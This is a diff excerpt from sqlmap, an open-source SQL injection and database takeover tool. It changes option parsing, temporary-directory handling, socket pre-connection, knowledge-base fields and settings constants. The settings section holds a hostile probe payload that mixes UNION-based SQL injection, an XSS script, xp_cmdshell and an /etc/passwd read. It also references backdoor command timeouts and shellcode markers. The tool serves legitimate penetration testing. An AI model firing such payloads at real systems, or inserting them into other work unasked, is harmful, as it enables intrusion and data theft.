||||
from xml.etree.ElementTree import ElementTree
|
||||
@@ -163,6 +166,7 @@ keepAliveHandler = keepalive.HTTPHandler()
|
||||
proxyHandler = urllib2.ProxyHandler()
|
||||
redirectHandler = SmartRedirectHandler()
|
||||
rangeHandler = HTTPRangeHandler()
|
||||
multipartPostHandler = multipartpost.MultipartPostHandler()
|
||||
|
||||
def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
"""
|
||||
@@ -385,7 +389,7 @@ def _loadQueries():
|
||||
try:
|
||||
tree.parse(paths.QUERIES_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
@@ -913,9 +917,9 @@ def _setTamperingFunctions():
|
||||
sys.path.insert(0, dirname)
|
||||
|
||||
try:
|
||||
module = __import__(filename[:-3].encode(sys.getfilesystemencoding()))
|
||||
except (ImportError, SyntaxError), msg:
|
||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
|
||||
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||
except (ImportError, SyntaxError), ex:
|
||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
|
||||
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
|
||||
|
||||
@@ -926,7 +930,7 @@ def _setTamperingFunctions():
|
||||
function.func_name = module.__name__
|
||||
|
||||
if check_priority and priority > last_priority:
|
||||
message = "it seems that you might have mixed "
|
||||
message = "it appears that you might have mixed "
|
||||
message += "the order of tamper scripts. "
|
||||
message += "Do you want to auto resolve this? [Y/n/q] "
|
||||
test = readInput(message, default="Y")
|
||||
@@ -998,6 +1002,8 @@ def _setWafFunctions():
|
||||
else:
|
||||
kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3])))
|
||||
|
||||
kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower())
|
||||
|
||||
def _setThreads():
|
||||
if not isinstance(conf.threads, int) or conf.threads <= 0:
|
||||
conf.threads = 1
|
||||
@@ -1036,7 +1042,7 @@ def _setSocketPreConnect():
|
||||
s = socket.socket(family, type, proto)
|
||||
s._connect(address)
|
||||
with kb.locks.socket:
|
||||
socket._ready[key].append(s._sock)
|
||||
socket._ready[key].append((s._sock, time.time()))
|
||||
except KeyboardInterrupt:
|
||||
break
|
||||
except:
|
||||
@@ -1051,9 +1057,17 @@ def _setSocketPreConnect():
|
||||
with kb.locks.socket:
|
||||
if key not in socket._ready:
|
||||
socket._ready[key] = []
|
||||
if len(socket._ready[key]) > 0:
|
||||
self._sock = socket._ready[key].pop(0)
|
||||
found = True
|
||||
while len(socket._ready[key]) > 0:
|
||||
candidate, created = socket._ready[key].pop(0)
|
||||
if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT:
|
||||
self._sock = candidate
|
||||
found = True
|
||||
break
|
||||
else:
|
||||
try:
|
||||
candidate.close()
|
||||
except socket.error:
|
||||
pass
|
||||
|
||||
if not found:
|
||||
self._connect(address)
|
||||
@@ -1064,6 +1078,7 @@ def _setSocketPreConnect():
|
||||
socket.socket.connect = connect
|
||||
|
||||
thread = threading.Thread(target=_)
|
||||
setDaemon(thread)
|
||||
thread.start()
|
||||
|
||||
def _setHTTPHandlers():
|
||||
@@ -1151,7 +1166,7 @@ def _setHTTPHandlers():
|
||||
debugMsg = "creating HTTP requests opener object"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
handlers = filter(None, [proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
|
||||
handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
|
||||
|
||||
if not conf.dropSetCookie:
|
||||
if not conf.loadCookies:
|
||||
@@ -1545,18 +1560,36 @@ def _createTemporaryDirectory():
|
||||
Creates temporary directory for this run.
|
||||
"""
|
||||
|
||||
try:
|
||||
if not os.path.isdir(tempfile.gettempdir()):
|
||||
os.makedirs(tempfile.gettempdir())
|
||||
except IOError, ex:
|
||||
errMsg = "there has been a problem while accessing "
|
||||
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
|
||||
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||
errMsg += "writeable by the current user"
|
||||
raise SqlmapSystemException, errMsg
|
||||
if conf.tmpDir:
|
||||
try:
|
||||
if not os.path.isdir(conf.tmpDir):
|
||||
os.makedirs(conf.tmpDir)
|
||||
|
||||
if "sqlmap" not in (tempfile.tempdir or ""):
|
||||
_ = os.path.join(conf.tmpDir, randomStr())
|
||||
open(_, "w+b").close()
|
||||
os.remove(_)
|
||||
|
||||
tempfile.tempdir = conf.tmpDir
|
||||
|
||||
warnMsg = "using '%s' as the temporary directory" % conf.tmpDir
|
||||
logger.warn(warnMsg)
|
||||
except (OSError, IOError), ex:
|
||||
errMsg = "there has been a problem while accessing "
|
||||
errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex)
|
||||
raise SqlmapSystemException, errMsg
|
||||
else:
|
||||
try:
|
||||
if not os.path.isdir(tempfile.gettempdir()):
|
||||
os.makedirs(tempfile.gettempdir())
|
||||
except IOError, ex:
|
||||
errMsg = "there has been a problem while accessing "
|
||||
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
|
||||
errMsg += "make sure that there is enough disk space left. If problem persists, "
|
||||
errMsg += "try to set environment variable 'TEMP' to a location "
|
||||
errMsg += "writeable by the current user"
|
||||
raise SqlmapSystemException, errMsg
|
||||
|
||||
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
|
||||
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
|
||||
|
||||
kb.tempDir = tempfile.tempdir
|
||||
@@ -1590,6 +1623,9 @@ def _cleanupOptions():
|
||||
else:
|
||||
conf.testParameter = []
|
||||
|
||||
if conf.agent:
|
||||
conf.agent = re.sub(r"[\r\n]", "", conf.agent)
|
||||
|
||||
if conf.user:
|
||||
conf.user = conf.user.replace(" ", "")
|
||||
|
||||
@@ -1654,10 +1690,20 @@ def _cleanupOptions():
|
||||
conf.testFilter = conf.testFilter.strip('*+')
|
||||
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
|
||||
|
||||
try:
|
||||
re.compile(conf.testFilter)
|
||||
except re.error:
|
||||
conf.testFilter = re.escape(conf.testFilter)
|
||||
|
||||
if conf.testSkip:
|
||||
conf.testSkip = conf.testSkip.strip('*+')
|
||||
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
|
||||
|
||||
try:
|
||||
re.compile(conf.testSkip)
|
||||
except re.error:
|
||||
conf.testSkip = re.escape(conf.testSkip)
|
||||
|
||||
if "timeSec" not in kb.explicitSettings:
|
||||
if conf.tor:
|
||||
conf.timeSec = 2 * conf.timeSec
|
||||
@@ -1687,7 +1733,7 @@ def _cleanupOptions():
|
||||
|
||||
if conf.outputDir:
|
||||
paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
|
||||
setPaths()
|
||||
setPaths(paths.SQLMAP_ROOT_PATH)
|
||||
|
||||
if conf.string:
|
||||
try:
|
||||
@@ -1799,6 +1845,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.cache.regex = {}
|
||||
kb.cache.stdev = {}
|
||||
|
||||
kb.captchaDetected = None
|
||||
|
||||
kb.chars = AttribDict()
|
||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
@@ -1807,6 +1855,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
|
||||
kb.columnExistsChoice = None
|
||||
kb.commonOutputs = None
|
||||
kb.cookieEncodeChoice = None
|
||||
kb.counters = {}
|
||||
kb.data = AttribDict()
|
||||
kb.dataOutputFlag = False
|
||||
@@ -1820,7 +1869,9 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.dnsMode = False
|
||||
kb.dnsTest = None
|
||||
kb.docRoot = None
|
||||
kb.dumpColumns = None
|
||||
kb.dumpTable = None
|
||||
kb.dumpKeyboardInterrupt = False
|
||||
kb.dynamicMarkings = []
|
||||
kb.dynamicParameter = False
|
||||
kb.endDetection = False
|
||||
@@ -1828,6 +1879,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.extendTests = None
|
||||
kb.errorChunkLength = None
|
||||
kb.errorIsNone = True
|
||||
kb.falsePositives = []
|
||||
kb.fileReadMode = False
|
||||
kb.followSitemapRecursion = None
|
||||
kb.forcedDbms = None
|
||||
@@ -1837,6 +1889,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.headersFp = {}
|
||||
kb.heuristicDbms = None
|
||||
kb.heuristicMode = False
|
||||
kb.heuristicPage = False
|
||||
kb.heuristicTest = None
|
||||
kb.hintValue = None
|
||||
kb.htmlFp = []
|
||||
@@ -1895,13 +1948,16 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}
|
||||
kb.requestCounter = 0
|
||||
kb.resendPostOnRedirect = None
|
||||
kb.resolutionDbms = None
|
||||
kb.responseTimes = {}
|
||||
kb.responseTimeMode = None
|
||||
kb.responseTimePayload = None
|
||||
kb.resumeValues = True
|
||||
kb.rowXmlMode = False
|
||||
kb.safeCharEncode = False
|
||||
kb.safeReq = AttribDict()
|
||||
kb.singleLogFlags = set()
|
||||
kb.skipSeqMatcher = False
|
||||
kb.reduceTests = None
|
||||
kb.tlsSNI = {}
|
||||
kb.stickyDBMS = False
|
||||
@@ -1909,6 +1965,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.storeCrawlingChoice = None
|
||||
kb.storeHashesChoice = None
|
||||
kb.suppressResumeInfo = False
|
||||
kb.tableFrom = None
|
||||
kb.technique = None
|
||||
kb.tempDir = None
|
||||
kb.testMode = False
|
||||
@@ -2139,6 +2196,8 @@ def _mergeOptions(inputOptions, overrideOptions):
|
||||
if inputOptions.pickledOptions:
|
||||
try:
|
||||
inputOptions = base64unpickle(inputOptions.pickledOptions)
|
||||
if type(inputOptions) == dict:
|
||||
inputOptions = AttribDict(inputOptions)
|
||||
_normalizeOptions(inputOptions)
|
||||
except Exception, ex:
|
||||
errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions
|
||||
@@ -2236,6 +2295,7 @@ def _setTorHttpProxySettings():
|
||||
infoMsg = "setting Tor HTTP proxy settings"
|
||||
logger.info(infoMsg)
|
||||
|
||||
s = None
|
||||
found = None
|
||||
|
||||
for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)):
|
||||
@@ -2247,12 +2307,13 @@ def _setTorHttpProxySettings():
|
||||
except socket.error:
|
||||
pass
|
||||
|
||||
s.close()
|
||||
if s:
|
||||
s.close()
|
||||
|
||||
if found:
|
||||
conf.proxy = "http://%s:%d" % (LOCALHOST, found)
|
||||
else:
|
||||
errMsg = "can't establish connection with the Tor proxy. "
|
||||
errMsg = "can't establish connection with the Tor HTTP proxy. "
|
||||
errMsg += "Please make sure that you have Vidalia, Privoxy or "
|
||||
errMsg += "Polipo bundle installed for you to be able to "
|
||||
errMsg += "successfully use switch '--tor' "
|
||||
@@ -2297,7 +2358,7 @@ def _checkTor():
|
||||
page = None
|
||||
|
||||
if not page or 'Congratulations' not in page:
|
||||
errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
|
||||
errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
|
||||
raise SqlmapConnectionException(errMsg)
|
||||
else:
|
||||
infoMsg = "Tor is properly being used"
|
||||
@@ -2330,10 +2391,6 @@ def _basicOptionValidation():
|
||||
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
|
||||
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.textOnly and conf.nullConnection:
|
||||
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
@@ -2533,11 +2590,9 @@ def _resolveCrossReferences():
|
||||
lib.request.connect.setHTTPHandlers = _setHTTPHandlers
|
||||
lib.utils.search.setHTTPHandlers = _setHTTPHandlers
|
||||
lib.controller.checks.setVerbosity = setVerbosity
|
||||
lib.controller.checks.setWafFunctions = _setWafFunctions
|
||||
|
||||
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
_setConfAttributes()
|
||||
_setKnowledgeBaseAttributes()
|
||||
_mergeOptions(inputOptions, overrideOptions)
|
||||
|
||||
@@ -136,6 +136,7 @@ optDict = {
|
||||
"tbl": "string",
|
||||
"col": "string",
|
||||
"excludeCol": "string",
|
||||
"pivotColumn": "string",
|
||||
"dumpWhere": "string",
|
||||
"user": "string",
|
||||
"excludeSysDbs": "boolean",
|
||||
@@ -189,6 +190,7 @@ optDict = {
|
||||
#"xmlFile": "string",
|
||||
"trafficFile": "string",
|
||||
"batch": "boolean",
|
||||
"binaryFields": "string",
|
||||
"charset": "string",
|
||||
"crawlDepth": "integer",
|
||||
"crawlExclude": "string",
|
||||
@@ -201,7 +203,6 @@ optDict = {
|
||||
"hexConvert": "boolean",
|
||||
"outputDir": "string",
|
||||
"parseErrors": "boolean",
|
||||
"pivotColumn": "string",
|
||||
"saveConfig": "string",
|
||||
"scope": "string",
|
||||
"testFilter": "string",
|
||||
@@ -217,23 +218,22 @@ optDict = {
|
||||
"dependencies": "boolean",
|
||||
"disableColoring": "boolean",
|
||||
"googlePage": "integer",
|
||||
"identifyWaf": "boolean",
|
||||
"mobile": "boolean",
|
||||
"offline": "boolean",
|
||||
"pageRank": "boolean",
|
||||
"purgeOutput": "boolean",
|
||||
"skipWaf": "boolean",
|
||||
"smart": "boolean",
|
||||
"tmpDir": "string",
|
||||
"wizard": "boolean",
|
||||
"verbose": "integer",
|
||||
},
|
||||
"Hidden": {
|
||||
"dummy": "boolean",
|
||||
"disablePrecon": "boolean",
|
||||
"binaryFields": "string",
|
||||
"profile": "boolean",
|
||||
"cpuThrottle": "integer",
|
||||
"forceDns": "boolean",
|
||||
"identifyWaf": "boolean",
|
||||
"skipWaf": "boolean",
|
||||
"ignore401": "boolean",
|
||||
"smokeTest": "boolean",
|
||||
"liveTest": "boolean",
|
||||
|
||||
@@ -26,12 +26,14 @@ def setDbms(dbms):
|
||||
hashDBWrite(HASHDB_KEYS.DBMS, dbms)
|
||||
|
||||
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
|
||||
_ = re.search("^%s" % _, dbms, re.I)
|
||||
_ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)
|
||||
|
||||
if _:
|
||||
dbms = _.group(1)
|
||||
|
||||
Backend.setDbms(dbms)
|
||||
if kb.resolutionDbms:
|
||||
hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms)
|
||||
|
||||
logger.info("the back-end DBMS is %s" % Backend.getDbms())
|
||||
|
||||
|
||||
@@ -10,7 +10,6 @@ import re
|
||||
import subprocess
|
||||
import string
|
||||
import sys
|
||||
import time
|
||||
import types
|
||||
|
||||
from lib.core.datatype import AttribDict
|
||||
@@ -19,10 +18,12 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||
from lib.core.enums import OS
|
||||
from lib.core.revision import getRevisionNumber
|
||||
|
||||
# sqlmap version and site
|
||||
VERSION = "1.0-stable"
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.0.9.1"
|
||||
REVISION = getRevisionNumber()
|
||||
VERSION_STRING = "sqlmap/%s" % VERSION
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||
SITE = "http://sqlmap.org"
|
||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||
@@ -35,7 +36,7 @@ BANNER = """\033[01;33m _
|
||||
|_ -| . | | | .'| . |
|
||||
|___|_ |_|_|_|_|__,| _|
|
||||
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
|
||||
|
||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||
DIFF_TOLERANCE = 0.05
|
||||
@@ -60,6 +61,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
||||
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
||||
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
||||
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
||||
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||
|
||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||
@@ -68,6 +70,9 @@ PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||
CHAR_INFERENCE_MARK = "%c"
|
||||
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
||||
|
||||
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
|
||||
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
|
||||
|
||||
# Regular expression used for recognition of textual content-type
|
||||
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
||||
|
||||
@@ -77,6 +82,9 @@ PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
||||
# Regular expression used for recognition of generic maximum connection messages
|
||||
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
||||
|
||||
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
|
||||
PRECONNECT_CANDIDATE_TIMEOUT = 10
|
||||
|
||||
# Regular expression used for extracting results from Google search
|
||||
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
||||
|
||||
@@ -129,6 +137,9 @@ HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
|
||||
# Default timeout for running commands over backdoor
|
||||
BACKDOOR_RUN_CMD_TIMEOUT = 5
|
||||
|
||||
# Number of seconds to wait for thread finalization at program end
|
||||
THREAD_FINALIZATION_TIMEOUT = 1
|
||||
|
||||
# Maximum number of techniques used in inject.py/getValue() per one value
|
||||
MAX_TECHNIQUES_PER_VALUE = 2
|
||||
|
||||
@@ -138,6 +149,9 @@ MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
||||
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
||||
METADB_SUFFIX = "_masterdb"
|
||||
|
||||
# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)
|
||||
PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
|
||||
|
||||
# Minimum time response set needed for time-comparison based on standard deviation
|
||||
MIN_TIME_RESPONSES = 30
|
||||
|
||||
@@ -277,12 +291,16 @@ BLANK = "<blank>"
|
||||
# String representation for current database
|
||||
CURRENT_DB = "CD"
|
||||
|
||||
# Regular expressions used for finding file paths in error messages
|
||||
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||
|
||||
# Regular expressions used for parsing error messages (--parse-errors)
|
||||
ERROR_PARSING_REGEXES = (
|
||||
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
|
||||
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>.+?)$",
|
||||
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
||||
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
||||
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
|
||||
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$"
|
||||
)
|
||||
|
||||
# Regular expression used for parsing charset info from meta html headers
|
||||
@@ -309,9 +327,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
||||
# Regex used for parsing XML Burp saved history items
|
||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||
|
||||
# Server header in CloudFlare responses
|
||||
CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
|
||||
|
||||
# Encoding used for Unicode data
|
||||
UNICODE_ENCODING = "utf8"
|
||||
|
||||
@@ -444,7 +459,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
|
||||
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
||||
|
||||
# Extensions skipped by crawler
|
||||
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
|
||||
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
|
||||
|
||||
# Patterns often seen in HTTP headers containing custom injection marking character
|
||||
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
|
||||
@@ -455,8 +470,8 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
||||
# Template used for common column existence check
|
||||
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||
|
||||
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
|
||||
# Payload used for checking of existence of IDS/IPS/WAF (dummier the better)
|
||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\"XSS\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#"
|
||||
|
||||
# Data inside shellcodeexec to be filled with random string
|
||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
@@ -482,6 +497,10 @@ SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
|
||||
# Only console display last n table rows
|
||||
TRIM_STDOUT_DUMP_SIZE = 256
|
||||
|
||||
# Reference: http://stackoverflow.com/a/3168436
|
||||
# Reference: https://support.microsoft.com/en-us/kb/899149
|
||||
DUMP_FILE_BUFFER_SIZE = 1024
|
||||
|
||||
# Parse response headers only first couple of times
|
||||
PARSE_HEADERS_LIMIT = 3
|
||||
|
||||
@@ -525,7 +544,7 @@ HASHDB_FLUSH_RETRIES = 3
|
||||
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||
|
||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
|
||||
HASHDB_MILESTONE_VALUE = "baFJusZrel" # python -c 'import random, string; print "".join(random.sample(string.ascii_letters, 10))'
|
||||
|
||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||
@@ -554,6 +573,9 @@ HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.')
|
||||
# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value
|
||||
DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">"
|
||||
|
||||
# Regular expression used for recognition of file inclusion errors
|
||||
FI_ERROR_REGEX = "(?i)[^\n]*(no such file|failed (to )?open)[^\n]*"
|
||||
|
||||
# Length of prefix and suffix used in non-SQLI heuristic checks
|
||||
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
|
||||
|
||||
@@ -563,6 +585,9 @@ MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||
# Maximum response total page size (trimmed if larger)
|
||||
MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
||||
|
||||
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
||||
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
||||
|
||||
# Maximum (multi-threaded) length of entry in bisection algorithm
|
||||
MAX_BISECTION_LENGTH = 50 * 1024 * 1024
|
||||
|
||||
@@ -570,7 +595,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
|
||||
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
|
||||
|
||||
# Generic SQL comment formation
|
||||
GENERIC_SQL_COMMENT = "-- -"
|
||||
GENERIC_SQL_COMMENT = "-- [RANDSTR]"
|
||||
|
||||
# Threshold value for turning back on time auto-adjustment mechanism
|
||||
VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||
@@ -579,7 +604,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||
